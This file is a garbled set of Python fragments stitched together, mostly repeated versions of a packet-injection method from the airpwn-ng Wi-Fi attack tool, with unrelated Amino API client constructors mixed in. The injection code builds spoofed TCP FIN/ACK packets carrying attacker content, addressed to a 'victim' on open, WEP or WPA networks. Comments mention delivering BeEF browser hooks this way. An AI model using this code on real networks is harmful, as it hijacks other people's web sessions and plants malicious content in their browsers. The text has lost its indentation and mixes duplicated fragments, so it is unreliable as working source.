def __init__(self, interface, args):
self.interface = interface
self.args = args
self.hdr = Headers()
self.injSocket = conf.L2socket(iface=interface)
## Managed mode injection
if args.m != args.i:
self.injMac = scapy.arch.get_if_hwaddr(interface)
def __init__(self, communityId=None):
self.headers = Headers().headers
self.mobile_headers = Headers().mobile_headers
self.device = Device().create_device()
self.interface = "https://aminoapps.com/api"
self.mobile_interface = "https://service.narvii.com/api/v1"
self.communityId = communityId
self.headers["cookie"] = ClientData().data["session"]
self.mobile_headers["NDCAUTH"] = ClientData().data["session"]
self.cookies = ClientData().data["session"]
def __init__(self):
self.headers = Headers().headers
self.mobile_headers = Headers().mobile_headers
self.device = Device().create_device()
self.interface = "https://aminoapps.com/api"
self.mobile_interface = "https://service.narvii.com/api/v1"
self.self_id = None
self.allowed_chats = []
self.allowed_communities = []
self.chat_client = ChatClient('bts-amino-umty')
self.handler_items = HandlerItems(self)
self.message_processor = MessageProcessor(self.handler_items)
self.is_leader = False
self.is_curator = False
self.delay_action = DelayAction()
def inject(self, vicmac, rtrmac, vicip, svrip, vicport, svrport, acknum, seqnum, injection, TSVal, TSecr, args, procTimerStart, procTimerEnd):
"""Send the injection using Scapy
This method is where the actual packet is created for sending
Things such as payload and associated flags are genned here
FIN/ACK flag is sent to the victim with this method
"""
injectTimerStart = time.time()
global npackets
npackets += 1
sys.stdout.write(Bcolors.OKBLUE + '[*] Injecting Packet to victim ' + Bcolors.WARNING + vicmac + Bcolors.OKBLUE + ' (TOTAL: ' + str(npackets) + ' injected packets)\r' + Bcolors.ENDC)
sys.stdout.flush()
if 'mon' in self.interface:
hdr = Headers()
headers = hdr.default(injection)
### Nasty quick&dirty PoC for pyDot11
### This if should be verified against open, and then combined when ==
if args.p:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = rtrmac,
subtype = 8L,
type = 2
)\
/Dot11QoS()\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)\
else:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = rtrmac
)\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)\
if TSVal is not None and TSecr is not None:
packet[TCP].options = [
('NOP', None),
('NOP', None),
('Timestamp',
((round(time.time()), TSVal)))
]
else:
packet[TCP].options = [
('NOP', None),
('NOP', None),
('Timestamp',
((round(time.time()), 0)))
]
if args.p:
packet = wepEncrypt(packet, args.w)
try:
sendp(packet, iface = self.interface, verbose = 0)
injectTimerEnd = time.time()
if args.d:
print '\nProcess Began: %f' % procTimerStart
print 'Process Ended: %f' % procTimerEnd
print 'Process Delta: %f' % (procTimerEnd - procTimerStart)
print 'Injection Began: %f' % injectTimerStart
print 'Injection Ended: %f' % injectTimerEnd
print 'Injection Delta: %f' % (injectTimerEnd - injectTimerStart)
except:
pass
### Single packet exit point
if args.single:
sys.stdout.write(Bcolors.OKBLUE + '[*] Injecting Packet to victim ' + Bcolors.WARNING + vicmac + Bcolors.OKBLUE + ' (TOTAL: ' + str(npackets) + ' injected packets)\r' + Bcolors.ENDC)
sys.exit(0)
else:
hdr = Headers()
headers = hdr.default(injection)
### Nasty quick&dirty PoC for pyDot11
if args.p:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = rtrmac
)\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = "FA",
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)\
if TSVal is not None:
packet[TCP].options = [
('NOP', None),
('NOP', None),
('Timestamp',
((round(time.time()), TSVal)))
]
else:
packet[TCP].options = [
('NOP', None),
('NOP', None),
('Timestamp',
((round(time.time()), 0)))
]
packet = wepEncrypt(packet, args.w)
else:
packet = Ether(
src = self.getHwAddr(self.interface),
dst = vicmac
)\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)\
if TSVal is not None:
packet[TCP].options = [
('NOP', None),
('NOP', None),
('Timestamp',
((round(time.time()), TSVal)))
]
else:
packet[TCP].options = [
('NOP', None),
('NOP', None),
('Timestamp',
((round(time.time()), 0)))
]
try:
### pyDot11 hack
if args.p:
sendp(packet, iface = args.i, verbose = 0)
else:
sendp(packet, iface = self.interface, verbose = 0)
if args.d:
injectTimerEnd = time.time()
print '\nProcess Began: %f' % procTimerStart
print 'Process Ended: %f' % procTimerEnd
print 'Process Delta: %f' % (procTimerEnd - procTimerStart)
print 'Injection Began: %f' % injectTimerStart
print 'Injection Ended: %f' % injectTimerEnd
print 'Injection Delta: %f' % (injectTimerEnd - injectTimerStart)
except:
pass
return
class Injector(object):
"""Uses scapy to inject packets on the networks"""
def __init__(self, interface, args):
self.interface = interface
self.args = args
self.hdr = Headers()
self.injSocket = conf.L2socket(iface=interface)
## Managed mode injection
if args.m != args.i:
self.injMac = scapy.arch.get_if_hwaddr(interface)
def inject(self, vicmac, rtrmac, dstmac, vicip, svrip, vicport, svrport,
acknum, seqnum, injection, TSVal, TSecr):
"""Send the injection using Scapy
This method is where the actual packet is created for sending
Things such as payload and associated flags are genned here
FIN/ACK flag is sent to the victim with this method
"""
## Headers
headers = self.hdr.default(injection)
## Monitor
if self.args.inj == 'mon':
## WEP/WPA
if self.args.wep or self.args.wpa:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac,
subtype = 8,
type = 2
)\
/Dot11QoS()\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
## Open
else:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac
)\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None and TSecr is not None:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()),
TSVal)))]
else:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()), 0)))
]
## WPA
if self.args.wpa is not None:
if self.shake.encDict.get(vicmac) == 'ccmp':
### Why are we incrementing here? Been done before in wpaEncrypt(), verify this.
try:
self.shake.PN[5] += 1
except:
self.shake.PN[4] += 1
try:
packet = wpaEncrypt(
self.shake.tgtInfo.get(vicmac)[1],
self.shake.origPkt, packet, self.shake.PN, True)
except:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] pyDot11 did not work\n[!] Injection failed\n '
+ Bcolors.ENDC)
sys.stdout.flush()
else:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] airpwn-ng cannot inject TKIP natively\n[!] Injection failed\n '
+ Bcolors.ENDC)
sys.stdout.flush()
## WEP Injection
elif self.args.wep is not None:
try:
packet = wepEncrypt(packet, self.args.wep)
except:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] pyDot11 did not work\n[!] Injection failed\n ' +
Bcolors.ENDC)
sys.stdout.flush()
## Managed
else:
headers = self.hdr.default(injection)
packet = Ether(\
src = self.injMac,\
dst = vicmac\
)\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), TSVal)))\
]
else:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), 0)))\
]
## Inject
gs(self.injSocket, packet, verbose=False)
print('[*] Packet injected to {0}'.format(vicmac))
def inject(self, vicmac, rtrmac, dstmac, vicip, svrip, vicport, svrport,
acknum, seqnum, injection, TSVal, TSecr):
"""Send the injection using Scapy
This method is where the actual packet is created for sending
Things such as payload and associated flags are genned here
FIN/ACK flag is sent to the victim with this method
"""
global npackets
npackets += 1
sys.stdout.write(Bcolors.OKBLUE + '[*] Injecting Packet to victim ' +
Bcolors.WARNING + vicmac + Bcolors.OKBLUE +
' (TOTAL: ' + str(npackets) + ' injected packets)\r' +
Bcolors.ENDC)
sys.stdout.flush()
## Injection using Monitor Mode
if self.args.inj == 'mon':
hdr = Headers()
headers = hdr.default(injection)
## WEP/WPA
if self.args.wep or self.args.wpa:
packet = self.rTap\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac,
subtype = 8L,
type = 2
)\
/Dot11QoS()\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
## Open
else:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac
)\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None and TSecr is not None:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()),
TSVal)))]
else:
packet[TCP].options = [('NOP', None), ('NOP', None),
('Timestamp', ((round(time.time()), 0)))
]
## WPA Injection
if self.args.wpa is not None:
if self.shake.encDict.get(vicmac) == 'ccmp':
### Why are we incrementing here? Been done before in wpaEncrypt(), verify this.
try:
self.shake.PN[5] += 1
except:
self.shake.PN[4] += 1
try:
packet = wpaEncrypt(
self.shake.tgtInfo.get(vicmac)[1],
self.shake.origPkt, packet, self.shake.PN, True)
except:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] pyDot11 did not work\n[!] Injection failed\n '
+ Bcolors.ENDC)
sys.stdout.flush()
else:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] airpwn-ng cannot inject TKIP natively\n[!] Injection failed\n '
+ Bcolors.ENDC)
sys.stdout.flush()
#packet = wpaEncrypt(self.shake.tgtInfo.get(vicmac)[0],
#self.shake.origPkt,
#packet,
#self.shake.PN,
#True)
if self.args.v is False:
sendp(packet, iface=self.interface, verbose=0)
else:
sendp(packet, iface=self.interface, verbose=1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
## WEP Injection
elif self.args.wep is not None:
try:
packet = wepEncrypt(packet, self.args.wep)
except:
sys.stdout.write(
Bcolors.FAIL +
'\n[!] pyDot11 did not work\n[!] Injection failed\n ' +
Bcolors.ENDC)
sys.stdout.flush()
if self.args.v is False:
sendp(packet, iface=self.interface, verbose=0)
else:
sendp(packet, iface=self.interface, verbose=1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
## Open WiFi Injection
else:
if self.args.v is False:
sendp(packet, iface=self.interface, verbose=0)
else:
sendp(packet, iface=self.interface, verbose=1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
### Single packet exit point
### Used for BeEF hook examples and such
if self.args.single is True:
sys.stdout.write(Bcolors.OKBLUE +
'[*] Injecting Packet to victim ' +
Bcolors.WARNING + vicmac + Bcolors.OKBLUE +
' (TOTAL: ' + str(npackets) +
' injected packets)\r' + Bcolors.ENDC)
sys.exit(0)
## Injection using Managed Mode
else:
hdr = Headers()
headers = hdr.default(injection)
packet = Ether(\
src = self.getHwAddr(self.interface),\
dst = vicmac\
)\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), TSVal)))\
]
else:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), 0)))\
]
if self.args.v is False:
sendp(packet, iface=self.interface, verbose=0)
else:
sendp(packet, iface=self.interface, verbose=1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
def inject(self,
vicmac,
rtrmac,
dstmac,
vicip,
svrip,
vicport,
svrport,
acknum,
seqnum,
injection,
TSVal,
TSecr):
"""Send the injection using Scapy
This method is where the actual packet is created for sending
Things such as payload and associated flags are genned here
FIN/ACK flag is sent to the victim with this method
"""
global npackets
npackets += 1
sys.stdout.write(Bcolors.OKBLUE + '[*] Injecting Packet to victim ' + Bcolors.WARNING + vicmac + Bcolors.OKBLUE + ' (TOTAL: ' + str(npackets) + ' injected packets)\r' + Bcolors.ENDC)
sys.stdout.flush()
## Injection using Monitor Mode
if self.args.inj == 'mon':
hdr = Headers()
headers = hdr.default(injection)
## WEP/WPA
if self.args.wep or self.args.wpa:
packet = self.rTap\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac,
subtype = 8L,
type = 2
)\
/Dot11QoS()\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
## Open
else:
packet = RadioTap()\
/Dot11(
FCfield = 'from-DS',
addr1 = vicmac,
addr2 = rtrmac,
addr3 = dstmac
)\
/LLC()\
/SNAP()\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None and TSecr is not None:
packet[TCP].options = [
('NOP', None),
('NOP', None),
('Timestamp', ((round(time.time()), TSVal)))
]
else:
packet[TCP].options = [
('NOP', None),
('NOP', None),
('Timestamp', ((round(time.time()), 0)))
]
## WPA Injection
if self.args.wpa is not None:
if self.shake.encDict.get(vicmac) == 'ccmp':
### Why are we incrementing here? Been done before in wpaEncrypt(), verify this.
try:
self.shake.PN[5] += 1
except:
self.shake.PN[4] += 1
try:
packet = wpaEncrypt(self.shake.tgtInfo.get(vicmac)[1],
self.shake.origPkt,
packet,
self.shake.PN,
True)
except:
sys.stdout.write(Bcolors.FAIL + '\n[!] pyDot11 did not work\n[!] Injection failed\n ' + Bcolors.ENDC)
sys.stdout.flush()
else:
sys.stdout.write(Bcolors.FAIL + '\n[!] airpwn-ng cannot inject TKIP natively\n[!] Injection failed\n ' + Bcolors.ENDC)
sys.stdout.flush()
#packet = wpaEncrypt(self.shake.tgtInfo.get(vicmac)[0],
#self.shake.origPkt,
#packet,
#self.shake.PN,
#True)
if self.args.v is False:
sendp(packet, iface = self.interface, verbose = 0)
else:
sendp(packet, iface = self.interface, verbose = 1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
## WEP Injection
elif self.args.wep is not None:
try:
packet = wepEncrypt(packet, self.args.wep)
except:
sys.stdout.write(Bcolors.FAIL + '\n[!] pyDot11 did not work\n[!] Injection failed\n ' + Bcolors.ENDC)
sys.stdout.flush()
if self.args.v is False:
sendp(packet, iface = self.interface, verbose = 0)
else:
sendp(packet, iface = self.interface, verbose = 1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
## Open WiFi Injection
else:
if self.args.v is False:
sendp(packet, iface = self.interface, verbose = 0)
else:
sendp(packet, iface = self.interface, verbose = 1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)
### Single packet exit point
### Used for BeEF hook examples and such
if self.args.single is True:
sys.stdout.write(Bcolors.OKBLUE + '[*] Injecting Packet to victim ' + Bcolors.WARNING + vicmac + Bcolors.OKBLUE + ' (TOTAL: ' + str(npackets) + ' injected packets)\r' + Bcolors.ENDC)
sys.exit(0)
## Injection using Managed Mode
else:
hdr = Headers()
headers = hdr.default(injection)
packet = Ether(\
src = self.getHwAddr(self.interface),\
dst = vicmac\
)\
/IP(
dst = vicip,
src = svrip
)\
/TCP(
flags = 'FA',
sport = int(svrport),
dport = int(vicport),
seq = int(seqnum),
ack = int(acknum)
)\
/Raw(
load = headers + injection
)
if TSVal is not None:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), TSVal)))\
]
else:
packet[TCP].options = [\
('NOP', None),\
('NOP', None),\
('Timestamp', ((round(time.time()), 0)))\
]
if self.args.v is False:
sendp(packet, iface = self.interface, verbose = 0)
else:
sendp(packet, iface = self.interface, verbose = 1)
if self.args.pcap is True:
wrpcap('outbound.pcap', packet)